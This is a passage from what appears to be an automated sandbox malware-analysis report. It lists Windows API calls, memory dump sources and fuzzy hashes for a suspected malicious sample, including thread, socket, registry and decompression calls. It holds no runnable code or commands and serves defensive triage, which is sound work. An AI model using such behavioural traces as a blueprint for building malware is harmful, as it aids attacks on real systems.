• StrCatW.SHLWAPI(00000000,?), ref: 00302874
• Process32NextW.KERNEL32(00000000,0000022C), ref: 003028D6
• CloseHandle.KERNEL32(00000000), ref: 003028E8
• LocalFree.KERNEL32(00000000), ref: 003028F8
Similarity
• API ID: lstrcpy$CloseFreeHandleLocalNextProcess32_memset_wcsrchrconstructlstrcmpi
• String ID:
• API String ID: 3449763073-0
APIs
• CloseHandle.KERNEL32(00000000), ref: 00317287
• CloseHandle.KERNEL32(00000000), ref: 003172A7
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003172BF
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 003172DE
• ResumeThread.KERNEL32(00000000), ref: 0031730C
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00317361
• CloseHandle.KERNEL32(00000000), ref: 0031738D
• CloseHandle.KERNEL32(00000000), ref: 003173AD
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003173C5
• CreateThread.KERNEL32(00000000,00000000,00000000,?,00000004,00000000), ref: 003173E4
• ResumeThread.KERNEL32(00000000), ref: 00317412
Similarity
• API ID: CloseCreateHandleThread$EventResume$ObjectSingleWait
• String ID: d
• API String ID: 738346648-2564639436
APIs
• LocalAlloc.KERNEL32(00000040,00000014), ref: 0031C786
• CreateThread.KERNEL32(00000000,00000000,?,00000000,00000004,00000000), ref: 0031C7A9
• CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0031C7C0
• ResumeThread.KERNEL32(00000000), ref: 0031C7FE
• CloseHandle.KERNEL32(00000000), ref: 0031C812
• CloseHandle.KERNEL32(00000000), ref: 0031C82C
• LocalFree.KERNEL32(00000000), ref: 0031C836
Similarity
• API ID: CloseCreateHandleLocalThread$AllocEventFreeResume
• String ID:
• API String ID: 4097846125-0
APIs
• CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0031F09C
• GetFileSize.KERNEL32(000000FF,00000000), ref: 0031F0B1
• LocalAlloc.KERNEL32(00000040,000000FF), ref: 0031F0C6
• ReadFile.KERNEL32(000000FF,00000000,000000FF,?,00000000), ref: 0031F0E7
• CloseHandle.KERNEL32(000000FF), ref: 0031F0FD
• LocalFree.KERNEL32(00000000), ref: 0031F114
• CloseHandle.KERNEL32(000000FF), ref: 0031F11E
Similarity
• API ID: File$CloseHandleLocal$AllocCreateFreeReadSize
• String ID:
• API String ID: 2550598358-0
APIs
• __snwprintf.LIBCMT ref: 0030A113
• RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 0030A148
• LocalAlloc.KERNEL32(00000040,00000000), ref: 0030A158
• RegGetValueW.ADVAPI32(80000001,?,-00008688,00000008,00000000,00000000,00000000), ref: 0030A189
• LocalFree.KERNEL32(00000000), ref: 0030A1A4
Similarity
• API ID: LocalValue$AllocFree__snwprintf
• String ID: SOFTWARE\%s
• API String ID: 297434584-297323700
APIs
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 003210EA
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00321149
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0032117D
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211A0
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 003211B8
• Sleep.KERNEL32(00000BB8), ref: 003211D1
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003211EB
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321203
• setsockopt.WS2_32(00000000,0000FFFF,00000008,00000001,00000004), ref: 0032126B
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00321281
• LocalAlloc.KERNEL32(00000040,00000004), ref: 00321298
• CreateThread.KERNEL32(00000000,00000000,00321580,00000000,00000000,00000000), ref: 003212C4
• GetTickCount.KERNEL32 ref: 003212E1
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00321309
• shutdown.WS2_32(00000000,00000002), ref: 003213D7
• closesocket.WS2_32(00000000), ref: 003213E1
• SetEvent.KERNEL32(00000000), ref: 003213F2
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003213FE
• CloseHandle.KERNEL32(00000000), ref: 00321419
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 003214D7
• SetEvent.KERNEL32(00000000), ref: 003214E8
• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 003214F4
• CloseHandle.KERNEL32(00000000), ref: 00321504
• CloseHandle.KERNEL32(00000000), ref: 0032151B
• CloseHandle.KERNEL32(00000000), ref: 00321534
• ReleaseMutex.KERNEL32(00000000), ref: 0032154E
• CloseHandle.KERNEL32(00000000), ref: 00321558
• CloseHandle.KERNEL32(00000000), ref: 00321568
• CloseHandle.KERNEL32(00000000), ref: 00321572
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: ObjectSingleWait$CloseHandle$Event$Create$AllocCountLocalMutexReleaseSleepThreadTickclosesocketsetsockoptshutdown
• String ID:
• API String ID: 2693238558-0
• Opcode ID: f9de0b3a9793678bb18e37ed2721d90974b6b0abad65e0d64f3faa4c13d7b636
• Instruction ID: 3adbae045b903b6f9914cd1822215a94dfa05921c1de37b8e67313897a712fe1
• Opcode Fuzzy Hash: f9de0b3a9793678bb18e37ed2721d90974b6b0abad65e0d64f3faa4c13d7b636
• Instruction Fuzzy Hash: F6111F74900214DFDB2ADFA0ED8CBAEB779FB58305F608549E60A662A0C7799984CF50
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 0030FA3E
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0030FA61
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: Module$FileHandleName
• String ID: KERNEL32.DLL$USER32.DLL
• API String ID: 4146042529-2880226457
• Opcode ID: 89309fc7eb6346450309b868c57fa43f7acad17f4e7d80e04880ab48b971b698
• Instruction ID: a64b05fbbda6d2d1a155849910036045ee165b8763a72d045a13a573c29bf626
• Opcode Fuzzy Hash: 89309fc7eb6346450309b868c57fa43f7acad17f4e7d80e04880ab48b971b698
• Instruction Fuzzy Hash: 71018B71B5521DEFC731DB709C9CBA972BCA758704F1044B4E50ED29C0E3B49A84DE61
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0033A5D0,00000008,00328199,00000000,00000000,?,?,003272E3,003246A2,?,?,00305B93,?), ref: 003280A2
• __lock.LIBCMT ref: 003280D6
  • Part of subcall function 0032C725: __mtinitlocknum.LIBCMT ref: 0032C73B
  • Part of subcall function 0032C725: __amsg_exit.LIBCMT ref: 0032C747
  • Part of subcall function 0032C725: EnterCriticalSection.KERNEL32(00305B93,00305B93,?,003280DB,0000000D,?,?,003272E3,003246A2,?,?,00305B93,?), ref: 0032C74F
• InterlockedIncrement.KERNEL32(888D8B31), ref: 003280E3
• __lock.LIBCMT ref: 003280F7
• ___addlocaleref.LIBCMT ref: 00328115
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
• String ID: KERNEL32.DLL
• API String ID: 637971194-2576044830
• Opcode ID: db74c46592c2e780cd1d79194976ff1c083544cfbab99763b62c9860de7fff81
• Instruction ID: 13f9afb0d1e1be062bccdb818a5547017adb2ab25261b9f82d31b96c91c1f1ef
• Opcode Fuzzy Hash: db74c46592c2e780cd1d79194976ff1c083544cfbab99763b62c9860de7fff81
• Instruction Fuzzy Hash: 2C016D71405B04EEE7229F69E84674AFBF0AF40325F10890EE4D65B2A1CBB4BA45DF12
APIs
• GetModuleHandleW.KERNEL32(ntdll.dll), ref: 0030602B
• GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0030603D
• GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 00306051
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
• API String ID: 667068680-2897241497
• Opcode ID: 5682538f95be50294cbe884dccf4fa223e6ef28d547f87a5818805950c82c65c
• Instruction ID: 43f7843ffe8a61e2e15fa9a68eeece6425b35fb254d6ac9e7a927b1407c41930
• Opcode Fuzzy Hash: 5682538f95be50294cbe884dccf4fa223e6ef28d547f87a5818805950c82c65c
• Instruction Fuzzy Hash: ACF0E7B4961204EFD7379BA0ECDAB6A7B7CE708311F10515DF909422A0CAB549C4CF51
APIs
• GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,0031BC23), ref: 00306859
• GetProcAddress.KERNEL32(0031BC23,RtlDecompressBuffer), ref: 0030686B
• GetProcAddress.KERNEL32(0031BC23,RtlGetCompressionWorkSpaceSize), ref: 0030687F
Strings
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
• API String ID: 667068680-1459209654
• Opcode ID: 6edc77674a61b7fe18e567370d1894f65136092daf632c20b8109617cb4dfad7
• Instruction ID: 68f7201bd6b48e4b5900ccd7efce618a636d88338ecf41b6ed402e0abc5d9d31
• Opcode Fuzzy Hash: 6edc77674a61b7fe18e567370d1894f65136092daf632c20b8109617cb4dfad7
• Instruction Fuzzy Hash: C1F03A74525304EBEB2BCBA4EC5ABAA76B8F704301F00659EE805822A0D7745D84CB51
APIs
• __CreateFrameInfo.LIBCMT ref: 0032768D
  • Part of subcall function 003239A8: __getptd.LIBCMT ref: 003239B6
  • Part of subcall function 003239A8: __getptd.LIBCMT ref: 003239C4
• __getptd.LIBCMT ref: 00327697
  • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
  • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
• __getptd.LIBCMT ref: 003276A5
• __getptd.LIBCMT ref: 003276B3
• __getptd.LIBCMT ref: 003276BE
• _CallCatchBlock2.LIBCMT ref: 003276E4
  • Part of subcall function 00323A4D: __CallSettingFrame@12.LIBCMT ref: 00323A99
  • Part of subcall function 0032778B: __getptd.LIBCMT ref: 0032779A
  • Part of subcall function 0032778B: __getptd.LIBCMT ref: 003277A8
Memory Dump Source
• Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
• Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
Yara matches
Similarity
• API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
• String ID:
• API String ID: 1602911419-0
• Opcode ID: 7e9a9415bb48b130ca597da9971d07d8f7f1b6ed5bc839191bc9c4e3969dfd77
• Instruction ID: e1740384339ef4a33df3b68263d5786bd0f0e5ba5822bbfb136eadd582762539
• Opcode Fuzzy Hash: 7e9a9415bb48b130ca597da9971d07d8f7f1b6ed5bc839191bc9c4e3969dfd77
• Instruction Fuzzy Hash: 0A11D7B1C01319DFDB11EFA4E845AAEBBB1FF04310F108069F854AB291DB789A119F91
                                                                                                            APIs
                                                                                                            • __getptd.LIBCMT ref: 00328B66
                                                                                                              • Part of subcall function 003281BE: __getptd_noexit.LIBCMT ref: 003281C1
                                                                                                              • Part of subcall function 003281BE: __amsg_exit.LIBCMT ref: 003281CE
                                                                                                            • __amsg_exit.LIBCMT ref: 00328B86
                                                                                                            • __lock.LIBCMT ref: 00328B96
                                                                                                            • InterlockedDecrement.KERNEL32(?), ref: 00328BB3
                                                                                                            • _free.LIBCMT ref: 00328BC6
                                                                                                            • InterlockedIncrement.KERNEL32(02B11790), ref: 00328BDE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3470314060-0
                                                                                                            • Opcode ID: 903be124f63c35cf5b06e1337116c2e83faede6e97decec97047ab11c24597aa
                                                                                                            • Instruction ID: 108e56523bde261bb6adba359f46f703ea523af1534bb214b61f4fb56c9ae8cd
                                                                                                            • Opcode Fuzzy Hash: 903be124f63c35cf5b06e1337116c2e83faede6e97decec97047ab11c24597aa
                                                                                                            • Instruction Fuzzy Hash: 5C019671902B31DBDB23AB68B845B5E7764BF40721F054109F8046B291CF346C81CFD2
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: b1e34ed92f43430cd3ea5f24a8b9a56030ec1da0f7b70e8892fa418246df88a8
                                                                                                            • Instruction ID: e7fcb550b9f05e5c240eb4184d3c2440c913e54564da80531ad5b16e429fd641
                                                                                                            • Opcode Fuzzy Hash: b1e34ed92f43430cd3ea5f24a8b9a56030ec1da0f7b70e8892fa418246df88a8
                                                                                                            • Instruction Fuzzy Hash: 353130316008199BFB1ECF88C6E8B6EB776FB90309F148269D0166FAD5C335E945CB51
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            • shutdown.WS2_32(?,00000002), ref: 0030723B
                                                                                                            • closesocket.WS2_32(?), ref: 00307245
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                                                            • String ID: d
                                                                                                            • API String ID: 1024630845-2564639436
                                                                                                            • Opcode ID: 0949a1fb7795e3cdf306149a63c94ea1886fcf168dc8a343921bd28c66e968b5
                                                                                                            • Instruction ID: 67e40bbced2882cbe4967d3a48b800bccd08c49e5c700af1f0bb3f515869be52
                                                                                                            • Opcode Fuzzy Hash: 0949a1fb7795e3cdf306149a63c94ea1886fcf168dc8a343921bd28c66e968b5
                                                                                                            • Instruction Fuzzy Hash: FE41EF319004248FFB3ACA68C8A5B59B776FB90305F0582E9D01E9F5D6C735AD95CF50
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00309164
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030919C
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003091D2
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00309222
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0030928C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: 470ba4f5440bec2cd31a803e028cf2210c1020be04eb4895f37b885b53703028
                                                                                                            • Instruction ID: 42493fd7e53e1f4271c0e92e5a18d86d0c5728cb189a1ef40db6d0f2a96d77d9
                                                                                                            • Opcode Fuzzy Hash: 470ba4f5440bec2cd31a803e028cf2210c1020be04eb4895f37b885b53703028
                                                                                                            • Instruction Fuzzy Hash: D13123316004198BFB1DCF88C6E8A6EB776FB90309F148269D0166FAD5C335A945CB51
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 0030702F
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00307073
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003070B5
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00307117
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 003071A5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956725434.000000000037A000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956752953.0000000000380000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_300000_downloaded_file.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                                                            • String ID: d
                                                                                                            • API String ID: 971639600-2564639436
                                                                                                            • Opcode ID: e4681c486b0af0ee7c50fe663984b839de4367e37845f22af353016d1f8c16a8
                                                                                                            • Instruction ID: 555f069cc87d3564d76697bad08e07da601a4779f71f0b3cc2ac1d1580c15e85
                                                                                                            • Opcode Fuzzy Hash: e4681c486b0af0ee7c50fe663984b839de4367e37845f22af353016d1f8c16a8
                                                                                                            • Instruction Fuzzy Hash: DA31CE31A104248BFB39CA68C8A4B59B776FB90309F0582E9D01EAF5D6C735AD95CF50
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(00000000), ref: 00306932
                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0030696A
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00306987
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 003069D7
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00306A95
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.1955095725.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.1955016958.0000000000300000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955714662.0000000000332000.00000002.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1955916664.000000000033C000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956576845.0000000000371000.00000004.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000372000.00000008.00000001.01000000.00000007.sdmp
                                                                                                            • Associated: 0000000D.00000002.1956685540.0000000000376000.00000008.00000001.01000000.00000007.sdmp
